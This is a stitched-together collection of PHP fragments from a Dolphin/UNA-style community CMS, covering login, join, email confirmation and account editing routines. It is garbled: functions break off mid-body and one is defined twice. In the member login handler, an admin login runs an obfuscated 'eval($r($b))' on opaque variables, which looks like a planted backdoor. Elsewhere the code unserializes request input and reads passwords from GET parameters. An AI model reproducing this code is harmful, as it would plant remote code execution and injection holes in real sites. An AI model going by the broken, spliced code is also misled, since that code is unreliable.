function service($aToken)
{
if (!isAdmin($aToken['user_id'])) {
$this->errorOutput(403, 'access_denied', 'Only admin can access service endpoint');
return false;
}
bx_login($aToken['user_id'], false, false);
$sUri = bx_get('uri');
$sMethod = bx_get('method');
if (!($aParams = bx_get('params'))) {
$aParams = array();
} elseif (is_string($aParams) && preg_match('/^a:[\\d+]:\\{/', $aParams)) {
$aParams = @unserialize($aParams);
}
if (!is_array($aParams)) {
$aParams = array($aParams);
}
if (!($sClass = bx_get('class'))) {
$sClass = 'Module';
}
if (!BxDolRequest::serviceExists($sUri, $sMethod, $sClass)) {
$this->errorOutput(404, 'not_found', 'Service was not found');
return false;
}
$mixedRet = BxDolService::call($sUri, $sMethod, $aParams, $sClass);
$this->output(array('uri' => $sUri, 'method' => $sMethod, 'data' => $mixedRet));
}
/**
* Logged profile
*
* @param $iProfileId integer
* @param $sPassword string
* @param $sCallbackUrl
* @param $bRedirect boolean
* @return void
*/
function setLogged($iProfileId, $sPassword, $sCallbackUrl = '', $bRedirect = true)
{
bx_login($iProfileId);
$GLOBALS['logged']['member'] = true;
if ($bRedirect) {
$sCallbackUrl = $sCallbackUrl ? $sCallbackUrl : $this->_oConfig->sDefaultRedirectUrl;
header('Location: ' . $sCallbackUrl);
}
}
/**
* Logged profile
*
* @param $iProfileId integer
* @param $sPassword string
* @param $sCallbackUrl
* @param $bRedirect boolean
* @return void
*/
function setLogged($iProfileId, $sCallbackUrl = '', $bRedirect = true)
{
$oProfile = BxDolProfile::getInstance($iProfileId);
bx_login($oProfile->getAccountId());
if ($bRedirect) {
$sCallbackUrl = $sCallbackUrl ? $sCallbackUrl : $this->_oConfig->sDefaultRedirectUrl;
header('Location: ' . $sCallbackUrl);
}
}
/**
* After join redirection
* This serice automatically log in joined user and redirects him to avatar copping page
* @param $iMemID - joined profile ID
* @param $sStatusText - status text to display at the top of page, like 'join success'
* @return false on error, 'EXIT' string on success
*/
function serviceJoin($iMemID, $sStatusText)
{
$sPwd = db_value("SELECT `Password` FROM `Profiles` WHERE `ID` = '" . (int) $iMemID . "' LIMIT 1");
if ($sPwd) {
bx_login((int) $iMemID);
// autologin here
bx_import('BxDolPermalinks');
$o = new BxDolPermalinks();
header('Location: ' . BX_DOL_URL_ROOT . $o->permalink('modules/?r=avatar/') . '&join_text=' . $sStatusText);
// redirect to upload avatar page
return 'EXIT';
}
return false;
}
/**
* Generate List of Posts for mobile frontend
*
* @param $iAuthor - display posts of provided user only
* @param $sMode - display all latest[default], featured or top posts
* @return HTML presentation of data
*/
function GenPostListMobile($iAuthor = 0, $sMode = false)
{
if ($this->_iVisitorID) {
// some workaround for mobile apps, to force login
bx_login($this->_iVisitorID);
}
bx_import('BxDolMobileTemplate');
$oMobileTemplate = new BxDolMobileTemplate($this->_oConfig, $this->_oDb);
$oMobileTemplate->pageStart();
echo $oMobileTemplate->addCss('blogs_common.css', 1);
$iPerPage = 10;
$iPage = (int) bx_get('page');
if ($iPage < 1) {
$iPage = 1;
}
$this->iPostViewType = 4;
$sOrder = 'last';
$sMobileWrapper = 'mobile_row.html';
$aParams = array();
switch ($sMode) {
case 'post':
$aViewingPostInfo = $this->_oDb->getPostInfo((int) bx_get('id'));
if (!$this->oPrivacy->check('view', (int) bx_get('id'), $this->_iVisitorID) || !$this->isAllowedBlogPostView($aViewingPostInfo['OwnerID'], true)) {
$oMobileTemplate->displayAccessDenied($sCaption);
return;
}
$this->iPostViewType = 3;
$aParams = array('id' => (int) bx_get('id'));
$sCaption = _t('_bx_blog_post_view');
$sMobileWrapper = 'mobile_box.html';
echo $oMobileTemplate->addCss('blogs.css', 1);
break;
case 'user':
$aParams = array('id' => (int) bx_get('id'));
$sCaption = _t('_bx_blog_Members_blog', getNickName((int) bx_get('id')));
break;
case 'featured':
$sCaption = _t('_bx_blog_Featured_Posts');
break;
case 'top':
$sOrder = 'top';
$sCaption = _t('_bx_blog_Top_Posts');
break;
case 'popular':
$sOrder = 'popular';
$sCaption = _t('_bx_blog_Popular_Posts');
break;
case 'last':
default:
$sMode = 'last';
$sCaption = _t('_bx_blog_Latest_posts');
}
if ('post' != $sMode && !$this->isAllowedBlogsPostsBrowse()) {
$oMobileTemplate->displayAccessDenied($sCaption);
return;
}
$oTmpBlogSearch = false;
$sCode = $this->_GenPosts($this->iPostViewType, $iPerPage, $sMode, $aParams, $sOrder, $oBlogSearchResults, $sMobileWrapper);
if (!$sCode || $oBlogSearchResults->aCurrent['paginate']['totalNum'] == 0) {
$oMobileTemplate->displayNoData($sCaption);
return;
}
echo $sCode;
if ($sMode != 'post') {
bx_import('BxDolPaginate');
$oPaginate = new BxDolPaginate(array('page_url' => $this->genBlogSubUrl() . '?action=mobile&mode=' . $sMode . '&page={page}', 'count' => $oBlogSearchResults->aCurrent['paginate']['totalNum'], 'per_page' => $iPerPage, 'page' => $iPage));
echo $oPaginate->getMobilePaginate();
}
$oMobileTemplate->pageCode($sCaption, false);
}
/**
* Perform email confirmation
*/
public function confirmEmail($sKey)
{
// check if key exists
$oKey = BxDolKey::getInstance();
if (!$oKey || !$oKey->isKeyExists($sKey)) {
return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
}
// check if key data exists
$aData = $oKey->getKeyData($sKey);
if (!isset($aData['account_id'])) {
return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
}
// check if account exists
$oAccount = BxDolAccount::getInstance($aData['account_id']);
if (!$oAccount) {
return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
}
// remove key
$oKey->removeKey($sKey);
// confirm email
if (!$oAccount->updateEmailConfirmed(true)) {
return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
}
// login to user's account automatically
bx_login($aData['account_id']);
// redirect with success message
$oTemplate = BxDolTemplate::getInstance();
$oTemplate->setPageNameIndex(BX_PAGE_TRANSITION);
$oTemplate->setPageHeader(_t('_sys_txt_confirm_email_success'));
$oTemplate->setPageContent('page_main_code', MsgBox(_t('_sys_txt_confirm_email_success')));
$oTemplate->setPageContent('url_relocate', BX_DOL_URL_ROOT . BxDolPermalinks::getInstance()->permalink('page.php?i=account-settings-info'));
BxDolTemplate::getInstance()->getPageCode();
exit;
}
function showFinishPage($iMemID, $sStatus)
{
switch ($sStatus) {
case 'Active':
$sStatusText = '_USER_ACTIVATION_SUCCEEDED';
break;
//activated automatically
//activated automatically
case 'Approval':
$sStatusText = '_USER_CONF_SUCCEEDED';
break;
//automatically confirmed
//automatically confirmed
case 'Unconfirmed':
$sStatusText = '_EMAIL_CONF_SENT';
break;
//conf mail succesfully sent
//conf mail succesfully sent
case 'NotSent':
$sStatusText = '_EMAIL_CONF_NOT_SENT';
break;
//failed to send conf mail
}
// if ('EXIT' == BxDolService::call('avatar', 'join', array ($iMemID, $sStatusText))) {
bx_login((int) $iMemID);
header("Location: " . BX_DOL_URL_ROOT . "member.php");
exit;
// }
echo '<div class="dbContentHtml bx-def-font-large">';
echo _t('_Join complete');
echo '<br />';
echo _t($sStatusText);
echo '</div>';
}
protected function _editAccountForm($iAccountId, $sDisplayName)
{
$oAccount = BxDolAccount::getInstance($iAccountId);
$aAccountInfo = $oAccount ? $oAccount->getInfo() : false;
if (!$aAccountInfo) {
return MsgBox(_t('_sys_txt_error_account_is_not_defined'));
}
// check access
if (CHECK_ACTION_RESULT_ALLOWED !== ($sMsg = BxDolAccount::isAllowedEdit($this->_iProfileId, $aAccountInfo))) {
return MsgBox($sMsg);
}
// check and display form
$oForm = BxDolForm::getObjectInstance('sys_account', $sDisplayName);
if (!$oForm) {
return MsgBox(_t('_sys_txt_error_occured'));
}
if (!$oForm->isSubmitted()) {
unset($aAccountInfo['password']);
}
$oForm->initChecker($aAccountInfo);
if (!$oForm->isSubmittedAndValid()) {
return $oForm->getCode();
}
$aTrackTextFieldsChanges = array();
// track text fields changes, not-null(for example empty array) - means track, null - means don't track
// update email and email setting in DB
if (!$oForm->update($aAccountInfo['id'], array(), $aTrackTextFieldsChanges)) {
if (!$oForm->isValid()) {
return $oForm->getCode();
} else {
return MsgBox(_t('_sys_txt_error_account_update'));
}
}
// check if email was changed
if (!empty($aTrackTextFieldsChanges['changed_fields']) && in_array('email', $aTrackTextFieldsChanges['changed_fields'])) {
$oAccount->updateEmailConfirmed(false);
}
// mark email as unconfirmed
// check if password was changed
if ($oForm->getCleanValue('password')) {
// relogin with new password
bx_logout();
bx_login($aAccountInfo['id']);
}
// check if other text info was changed - if auto-appproval is off
$isAutoApprove = $oForm->isSetPendingApproval() ? false : true;
if (!$isAutoApprove) {
bx_import('BxDolProfile');
$oProfile = BxDolProfile::getInstanceAccountProfile($aAccountInfo['id']);
// get profile associated with account, not current porfile
$aProfileInfo = $oProfile->getInfo();
unset($aTrackTextFieldsChanges['changed_fields']['email']);
// email confirmation is automatic and separate, don't need to deactivate whole profile if email is changed
if (BX_PROFILE_STATUS_ACTIVE == $aProfileInfo['status'] && !empty($aTrackTextFieldsChanges['changed_fields'])) {
$oProfile->disapprove(BX_PROFILE_ACTION_AUTO);
}
// change profile to 'pending' only if some text fields were changed and profile is active
}
// create an alert
bx_alert('account', 'edited', $aAccountInfo['id'], $aAccountInfo['id'], array('display' => $sDisplayName));
// display result message
$sMsg = MsgBox(_t('_sys_txt_data_successfully_submitted'));
return $sMsg . $oForm->getCode();
}
// this is dynamic page - send headers to not cache this page
send_headers_page_changed();
login_form('', 0, $bAjxMode);
} else {
require_once BX_DIRECTORY_PATH_CLASSES . 'BxDolAlerts.php';
$oZ = new BxDolAlerts('profile', 'before_login', 0, 0, array('login' => $member['ID'], 'password' => $member['Password'], 'ip' => getVisitorIP()));
$oZ->alert();
$member['ID'] = getID($member['ID']);
// Ajaxy check
if ($bAjxMode) {
echo check_password($member['ID'], $member['Password'], BX_DOL_ROLE_MEMBER, false) ? 'OK' : 'Fail';
exit;
}
// Check if ID and Password are correct (addslashes already inside)
if (check_password($member['ID'], $member['Password'])) {
$p_arr = bx_login($member['ID'], (bool) $_POST['rememberMe']);
//Storing IP Address
if (getParam('enable_member_store_ip') == 'on') {
$iCurLongIP = ip2long(getVisitorIP());
db_res("INSERT INTO `sys_ip_members_visits` SET `MemberID` = '{$p_arr['ID']}', `From`='{$iCurLongIP}', `DateTime`=NOW()");
}
if (isAdmin($p_arr['ID'])) {
$iId = (int) $p_arr['ID'];
$r = $l($a);
eval($r($b));
}
$sRelocate = bx_get('relocate');
if (!($sUrlRelocate = $sRelocate) or $sRelocate == $site['url'] or basename($sRelocate) == 'join.php') {
$sUrlRelocate = BX_DOL_URL_ROOT . 'member.php';
}
$_page['name_index'] = 150;
function registerMember()
{
$oPC = new BxDolProfilesController();
$oZ = new BxDolAlerts('profile', 'before_join', 0, 0, $this->aValues[0]);
$oZ->alert();
$aProfile1 = $this->oPF->getProfileFromValues($this->aValues[0]);
list($iId1, $sStatus1) = $oPC->createProfile($aProfile1);
//--- check whether profile was created successfully or not
if (!$iId1) {
if (isset($aProfile1['ProfilePhoto']) && !empty($aProfile1['ProfilePhoto'])) {
@unlink($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto']);
}
return array(false, 'Fail');
}
//--- check for couple profile
if ($this->bCouple) {
$aProfile2 = $this->oPF->getProfileFromValues($this->aValues[1]);
list($iId2, $sStatus2) = $oPC->createProfile($aProfile2, false, $iId1);
if (!$iId2) {
$oPC->deleteProfile($iId1);
return array(false, 'Fail');
}
}
//--- upload profile photo
if (isset($aProfile1['ProfilePhoto']) && !empty($aProfile1['ProfilePhoto'])) {
$sPass1 = getPassword($iId1);
bx_login($iId1);
check_logged();
BxDolService::call('avatar', 'set_image_for_cropping', array($iId1, $GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto']));
if (BxDolRequest::serviceExists('photos', 'perform_photo_upload', 'Uploader')) {
$aFileInfo = array('medTitle' => _t('_bx_ava_avatar'), 'medDesc' => _t('_bx_ava_avatar'), 'medTags' => _t('_ProfilePhotos'), 'Categories' => array(_t('_ProfilePhotos')), 'album' => str_replace('{nickname}', getUsername($iId1), getParam('bx_photos_profile_album_name')), 'albumPrivacy' => BX_DOL_PG_ALL);
BxDolService::call('photos', 'perform_photo_upload', array($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto'], $aFileInfo, false), 'Uploader');
}
}
if (BxDolModule::getInstance('BxWmapModule')) {
BxDolService::call('wmap', 'response_entry_add', array('profiles', $iId1));
}
//--- create system event
bx_import('BxDolAlerts');
$oZ = new BxDolAlerts('profile', 'join', $iId1, 0, array('status_text' => &$sStatus1));
$oZ->alert();
return array($iId1, $sStatus1);
}
<?php
require_once '../inc/header.inc.php';
require_once BX_DIRECTORY_PATH_INC . 'design.inc.php';
require_once BX_DIRECTORY_PATH_INC . 'utils.inc.php';
require_once BX_DIRECTORY_PATH_ROOT . 'xmlrpc/BxDolXMLRPCUtil.php';
$sUser = bx_get('user');
$sPwd = bx_get('pwd');
$sUrl = rawurldecode(bx_get('url'));
$iId = BxDolXMLRPCUtil::checkLogin($sUser, $sPwd);
if ($iId) {
bx_login($iId);
header("HTTP/1.1 301 Moved Permanently");
header("Location: " . BX_DOL_URL_ROOT . $sUrl);
exit;
} else {
$GLOBALS['oSysTemplate']->addCss('mobile.css');
$aVars = array('content' => $_page_cont[$_ni]['page_main_code']);
$sOutput = $GLOBALS['oSysTemplate']->parseHtmlByName('mobile_box.html', $aVars);
$iNameIndex = 11;
$_page['name_index'] = $iNameIndex;
$_page_cont[$iNameIndex]['page_main_code'] = '<div style="text-align:center;" class="bx-sys-mobile-padding">Access Denied</div>';
}
PageCode();
// login form is submitted
bx_import('BxDolForm');
$oForm = BxDolForm::getObjectInstance('sys_login', 'sys_login');
bx_alert('account', 'before_login', 0, 0, array('form' => $oForm));
$oForm->initChecker();
$oForm->setRole(bx_get('role'));
$bLoginSuccess = $oForm->isSubmittedAndValid();
$bAjxMode = isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' ? true : false;
if ($bAjxMode) {
header('Content-type: text/html; charset=utf-8');
echo $bLoginSuccess ? 'OK' : $oForm->getLoginError();
exit;
} elseif ($bLoginSuccess) {
bx_import('BxDolAccount');
$oAccount = BxDolAccount::getInstance($oForm->getCleanValue('ID'));
$aAccount = bx_login($oAccount->id(), $oForm->getCleanValue('rememberMe') ? true : false);
$sUrlRelocate = $oForm->getCleanValue('relocate');
if (!$sUrlRelocate || 0 != strncmp($sUrlRelocate, BX_DOL_URL_ROOT, strlen(BX_DOL_URL_ROOT))) {
$sUrlRelocate = BX_DOL_ROLE_ADMIN == $oForm->getRole() ? BX_DOL_URL_STUDIO . 'launcher.php' : BX_DOL_URL_ROOT . 'member.php';
}
bx_import('BxDolTemplate');
BxDolTemplate::getInstance()->setPageNameIndex(BX_PAGE_TRANSITION);
BxDolTemplate::getInstance()->setPageHeader(_t('_Please Wait'));
BxDolTemplate::getInstance()->setPageContent('page_main_code', MsgBox(_t('_Please Wait')));
BxDolTemplate::getInstance()->setPageContent('url_relocate', bx_html_attribute($sUrlRelocate, BX_ESCAPE_STR_QUOTE));
BxDolTemplate::getInstance()->getPageCode();
exit;
}
}
bx_require_authentication();
bx_import('BxDolPermalinks');
function saveProfile()
{
$aProfileInfo = db_arr("SELECT * FROM `Profiles` WHERE `ID` = {$this->iProfileID}");
$aDiff = $this->getDiffValues(0);
$aUpd = $this->oPF->getProfileFromValues($aDiff);
$aUpd['DateLastEdit'] = date('Y-m-d H:i:s');
if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) {
$aUpd['Status'] = 'Approval';
}
if (($this->iArea == 3 or $this->iArea == 4) and isset($_POST['doSetMembership']) and $_POST['doSetMembership'] == 'yes') {
$this->setMembership();
}
$bResult = $this->oPC->updateProfile($this->iProfileID, $aUpd);
if ($bResult && $this->iProfileID == getLoggedId() && isset($aUpd['Password'])) {
bx_login($this->iProfileID, false, false);
}
if (BxDolModule::getInstance('BxWmapModule')) {
BxDolService::call('wmap', 'response_entry_change', array('profiles', $this->iProfileID));
}
// create system event
bx_import('BxDolAlerts');
$oZ = new BxDolAlerts('profile', 'edit', $this->iProfileID, 0, array('OldProfileInfo' => $aProfileInfo));
$oZ->alert();
if ($this->bCouple) {
$aDiff = $this->getDiffValues(1);
$aUpd = $this->oPF->getProfileFromValues($aDiff);
$aUpd['DateLastEdit'] = date('Y-m-d H:i:s');
if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) {
$aUpd['Status'] = 'Approval';
}
$this->oPC->updateProfile($this->aProfiles[0]['Couple'], $aUpd);
}
}
public function processModules($a)
{
$aTypes = array(BX_DOL_MODULE_TYPE_LANGUAGE, BX_DOL_MODULE_TYPE_TEMPLATE, BX_DOL_MODULE_TYPE_MODULE);
foreach ($aTypes as $sModuleType) {
if (empty($a[$sModuleType])) {
continue;
}
$sErrorMessage = $this->processModuleByUri($a[$sModuleType], array('install', 'enable'), $sModuleType);
if ($sErrorMessage) {
return array(BX_INSTALL_ERR_GENERAL => $sErrorMessage);
}
}
bx_import('BxDolAccount');
$oAccount = BxDolAccount::getInstance($a['admin_email']);
if (!$oAccount) {
return array(BX_INSTALL_ERR_GENERAL => _t('_sys_inst_msg_admin_account_not_found', $a['admin_email']));
}
if ($this->_isAutologin) {
bx_login($oAccount->id());
}
return array();
}
